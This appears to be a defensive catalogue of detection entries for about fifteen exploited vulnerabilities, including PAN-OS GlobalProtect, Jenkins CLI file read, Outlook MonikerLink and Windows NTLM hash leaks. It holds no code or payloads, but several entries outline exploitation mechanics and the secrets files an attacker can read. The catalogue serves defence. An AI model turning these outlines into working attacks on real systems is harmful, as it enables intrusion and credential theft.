CVE-2025-61932 is an Improper Verification of Source of a Communication Channel (CWE-940) vulnerability in Motex LANSCOPE Endpoint Manager. This flaw allows an attacker to send commands or data through a communication channel without proper verification of the channel's origin, potentially enabling unauthorized control over managed endpoints. The vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Attackers may abuse this to impersonate the LANSCOPE management server and push malicious instructions to endpoint agents.
vendor: Motex product: LANSCOPE Endpoint Manager cwe: CWE-940 disclosed: Oct 22, 2025 cvss: unscored write-up soon
- CVE-2022-48503 KEV
CVE-2022-48503 Apple Multiple Products Unspecified Vulnerability Exploitation
Detects potential exploitation of CVE-2022-48503, an unspecified vulnerability affecting multiple Apple products. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Detection focuses on suspicious process activity, network connections, and crash telemetry from Apple ecosystem processes that may indicate exploitation attempts.
vendor: Apple product: Multiple Products disclosed: Oct 20, 2025 cvss: unscored write-up soon
- CVE-2025-2746 KEV
CVE-2025-2746: Kentico Xperience CMS Authentication Bypass
Detects exploitation of CVE-2025-2746, an authentication bypass vulnerability (CWE-288) in Kentico Xperience CMS that allows attackers to access protected resources via alternate paths or channels without valid credentials. This vulnerability is actively exploited in the wild (CISA KEV).
vendor: Kentico product: Xperience CMS cwe: CWE-288 disclosed: Oct 20, 2025 cvss: unscored write-up soon
- CVE-2025-2747 KEV
Kentico Xperience CMS Authentication Bypass (CVE-2025-2747)
Detects exploitation of CVE-2025-2747, an authentication bypass vulnerability (CWE-288) in Kentico Xperience CMS. Attackers can access protected administrative or content management endpoints via alternate paths or channels without valid credentials, enabling unauthorized access to sensitive CMS functionality. This vulnerability is actively exploited in the wild and listed in CISA KEV.
vendor: Kentico product: Xperience CMS cwe: CWE-288 disclosed: Oct 20, 2025 cvss: unscored write-up soon
- CVE-2025-21589 Theoretical
Juniper Session Smart Router Authentication Bypass
CVE-2025-21589 is a critical (CVSS 9.8) authentication bypass vulnerability in Juniper Networks Session Smart Router (formerly 128T), Session Smart Conductor, and WAN Assurance Managed Routers. An unauthenticated network attacker can bypass authentication via an alternate path or channel to take full administrative control of affected devices. Affected versions span 5.6.7 through 6.3.x prior to their respective fixed releases (5.6.17, 6.0.8, 6.1.12-lts, 6.2.8-lts, 6.3.3-r2). Successful exploitation gives the attacker administrative access to manage routing, tunnels, and network policy across the SD-WAN fabric — a ransomware precursor and lateral movement enabler in environments where Juniper SSR provides WAN connectivity for branch offices.
vendor: Juniper Networks product: Session Smart Router, Session Smart Conductor… cwe: CWE-288 disclosed: Sep 10, 2025 cvss: 9.8 critical write-up soon
- CVE-2025-24054 KEV PoC
Windows NTLM Credential Leak via File Download Interaction
CVE-2025-24054 is a medium-severity (CVSS 6.5 per Microsoft, 5.4 per NIST) Windows NTLM spoofing vulnerability caused by external control of file name or path (CWE-73). An attacker can leak NTLMv2 credentials by inducing a victim to download and interact with (or simply unzip) a malicious archive containing a specially crafted .library-ms, .searchConnector-ms, or similar Windows shell integration file. The interaction triggers an automatic NTLM authentication to an attacker-controlled server. CISA added this to the KEV catalog with a due date of May 8, 2025, and public exploits are available on Exploit-DB. This is closely related to CVE-2024-43451 but triggers through different file types (library files, search connectors) rather than .url shortcuts.
vendor: Microsoft product: Windows cwe: CWE-73 disclosed: Mar 11, 2025 cvss: 6.5 medium write-up soon
- CVE-2025-21298 Public PoC PoC
Windows OLE Remote Code Execution via Malicious RTF Document
CVE-2025-21298 is a critical (CVSS 9.8) use-after-free (CWE-416) remote code execution vulnerability in the Windows Object Linking and Embedding (OLE) subsystem. An attacker can exploit this vulnerability by sending a victim a specially crafted email containing a malicious RTF document. Simply previewing the email in Microsoft Outlook's Preview Pane is sufficient to trigger code execution — no user double-click required. The vulnerability affects all supported Windows versions (Windows 10, 11, Server 2008–2025) and is particularly dangerous in SMB environments where Outlook is the standard email client and Preview Pane is enabled by default. As a critical no-interaction RCE via a ubiquitous file format, this vulnerability is a high-priority patching target.
vendor: Microsoft product: Windows, Windows OLE cwe: CWE-416 disclosed: Jan 14, 2025 cvss: 9.8 critical write-up soon
- CVE-2024-43451 KEV
Windows NTLM Hash Disclosure via File Interaction (NTLMv2 Spoofing)
CVE-2024-43451 is a medium-severity (CVSS 6.5) NTLM hash disclosure spoofing vulnerability in Windows NTLMv2 authentication. The flaw is triggered when a user opens, inspects, or right-clicks a malicious file (e.g., a .url or specially crafted shortcut file) — Windows automatically initiates an NTLM authentication exchange to an attacker-controlled server, disclosing the user's NTLMv2 hash without any explicit credential entry. The vulnerability stems from CWE-73 (External Control of File Name or Path). CISA added this to the KEV catalog with a remediation deadline of December 3, 2024. NTLMv2 hashes can be cracked offline or relayed for lateral movement, making this a credential harvesting precursor especially effective in phishing and malicious email attachment campaigns.
vendor: Microsoft product: Windows cwe: CWE-73 disclosed: Nov 12, 2024 cvss: 6.5 medium write-up soon
- CVE-2024-38112 KEV
Windows MSHTML Spoofing via .url File Phishing (Void Banshee)
CVE-2024-38112 is a high-severity (CVSS 7.5) spoofing vulnerability in the Windows MSHTML Platform. Threat actors crafted malicious .url files that, when opened, invoke Internet Explorer's MSHTML engine via the mhtml: URI handler — even on systems where IE is disabled or removed. This allowed attackers to bypass modern browser security controls and render attacker-controlled HTML/JavaScript content, leading to code execution or credential phishing. The vulnerability was actively exploited by the APT group Void Banshee as a zero-day to deliver infostealer malware (Atlantida Stealer) targeting North American and European organisations. CISA added this to the KEV catalog with a remediation deadline of July 30, 2024.
vendor: Microsoft product: Windows, MSHTML Platform cwe: CWE-668 disclosed: Jul 9, 2024 cvss: 7.5 high write-up soon
- CVE-2024-30078 Theoretical
Windows Wi-Fi Driver Remote Code Execution via Adjacent Network
CVE-2024-30078 is a high-severity (CVSS 8.8) remote code execution vulnerability in the Windows Wi-Fi Driver. An unauthenticated attacker within Wi-Fi radio range of a target can execute arbitrary code on the victim's device by sending a specially crafted network packet. No user interaction is required. The attack vector is 'Adjacent Network' (AV:A), meaning the attacker must be on the same network segment or within Wi-Fi broadcast range. All supported Windows versions are affected (Windows 10, 11, Server 2008–2022). This vulnerability is particularly relevant for SMB environments where employees work in shared offices, co-working spaces, hotels, or coffee shops — any shared Wi-Fi environment with other devices in range becomes a potential attack surface. Despite no confirmed in-the-wild exploitation at time of disclosure, the lack of user interaction makes it a high-priority patch.
vendor: Microsoft product: Windows, Windows Wi-Fi Driver cwe: CWE-591 disclosed: Jun 11, 2024 cvss: 8.8 high write-up soon
- CVE-2024-3400 KEV
Palo Alto PAN-OS GlobalProtect Command Injection (Operation MidnightEclipse)
CVE-2024-3400 is a maximum-severity (CVSS 10.0) command injection vulnerability in Palo Alto Networks PAN-OS, specifically in the GlobalProtect feature. The flaw allows unauthenticated remote attackers to execute arbitrary code with root privileges on the firewall by exploiting improper input validation in the GlobalProtect service, which creates arbitrary files that are then executed. Affected versions include PAN-OS 10.2.x (through 10.2.7), 11.0.x, and 11.1.x with GlobalProtect gateway or portal enabled. Cloud NGFW, Panorama, and Prisma Access are not affected. The vulnerability was exploited as a zero-day by the threat actor UTA0218 in Operation MidnightEclipse to deploy the UPSTYLE backdoor. CISA added this to the KEV catalog with active in-the-wild exploitation confirmed. As Palo Alto firewalls are widely deployed by SMBs and enterprises as perimeter security, this is a critical priority.
vendor: Palo Alto Networks product: PAN-OS, GlobalProtect cwe: CWE-77 disclosed: Apr 12, 2024 cvss: 10.0 critical write-up soon
- CVE-2024-26234 Weaponized PoC
Windows Proxy Driver Spoofing via Malicious Signed Driver
CVE-2024-26234 is a medium-severity (CVSS 6.7) proxy driver spoofing vulnerability in Windows. The vulnerability was discovered when a malicious driver signed with a valid Microsoft Hardware Compatibility Publisher certificate (WHCP) was found in the wild — the driver impersonated a legitimate Xiaomi application but contained proxy/backdoor functionality. The flaw relates to improper access control (CWE-284) in how Windows handles proxy driver installations. Despite the medium CVSS score, this vulnerability has forensic significance as it demonstrates abuse of the Microsoft WHCP signing process for driver-level persistence and traffic interception. It requires high privileges to exploit (local), limiting its attack surface to post-compromise or insider threat scenarios. Useful for detecting signed malicious drivers and driver-based persistence on Windows endpoints.
vendor: Microsoft product: Windows cwe: CWE-284 disclosed: Apr 9, 2024 cvss: 6.7 medium write-up soon
- CVE-2024-21413 KEV
Microsoft Outlook RCE via Moniker Link (MonikerLink)
CVE-2024-21413 is a critical (CVSS 9.8) remote code execution vulnerability in Microsoft Outlook caused by improper input validation. Dubbed 'MonikerLink', the flaw allows an attacker to craft a malicious hyperlink using the file:// URI scheme combined with an exclamation mark (!), bypassing Outlook's Protected View and MOTW (Mark of the Web) safeguards. When a user clicks the link, Outlook resolves it as a Component Object Model (COM) moniker, triggering NTLM authentication negotiation to an attacker-controlled server (leaking NTLMv2 hashes) and potentially executing arbitrary code. Affected products include Microsoft 365 Apps for Enterprise, Office 2016, Office 2019, and Office LTSC 2021. CISA added this to the KEV catalog with a due date of February 27, 2025, indicating active exploitation in the wild.
vendor: Microsoft product: Outlook, Microsoft 365 Apps… cwe: CWE-20 disclosed: Feb 13, 2024 cvss: 9.8 critical write-up soon
- CVE-2024-23897 KEV PoC
Jenkins Arbitrary File Read via CLI Argument Parser (Pre-Auth RCE Chain)
CVE-2024-23897 is a critical (CVSS 9.8) arbitrary file read vulnerability in the Jenkins CI/CD platform. The Jenkins CLI command parser uses the args4j library's '@' character expansion feature, which substitutes '@filepath' with the file's contents in command arguments. This expansion is not disabled, allowing unauthenticated attackers (or those with minimal permissions) to read arbitrary files from the Jenkins controller filesystem via CLI commands. Readable files include sensitive configuration files (/var/jenkins_home/secrets/master.key, /etc/passwd, credential stores), and the file read can be chained to achieve unauthenticated RCE by extracting the cryptographic secrets needed to deserialise malicious data. Affects Jenkins 2.441 and earlier (LTS 2.426.2 and earlier). CISA added this to the KEV catalog with a due date of September 9, 2024. Jenkins servers are commonly internet-exposed by development teams in SMB environments.
vendor: Jenkins product: Jenkins cwe: CWE-22 disclosed: Jan 24, 2024 cvss: 9.8 critical write-up soon
- CVE-2024-21887 KEV
Ivanti Connect Secure Authenticated Command Injection (Chained with CVE-2023-46805)
CVE-2024-21887 is a critical (CVSS 9.1) command injection vulnerability in Ivanti Connect Secure (formerly Pulse Secure) and Policy Secure web components. An authenticated administrator can send specially crafted requests to web endpoints to execute arbitrary commands on the appliance. When chained with CVE-2023-46805 (authentication bypass, CVSS 8.2), the combination allows fully unauthenticated remote code execution. The combined exploit chain was used extensively by the China-nexus threat actor UNC5221 as a zero-day, targeting defence, government, financial, and telecom organisations globally. CISA required mitigation by January 22, 2024. Ivanti Connect Secure VPN appliances are widely deployed by SMBs and enterprises as remote access infrastructure, making this a high-priority detection target.
vendor: Ivanti product: Connect Secure, Policy Secure cwe: CWE-77 disclosed: Jan 12, 2024 cvss: 9.1 critical write-up soon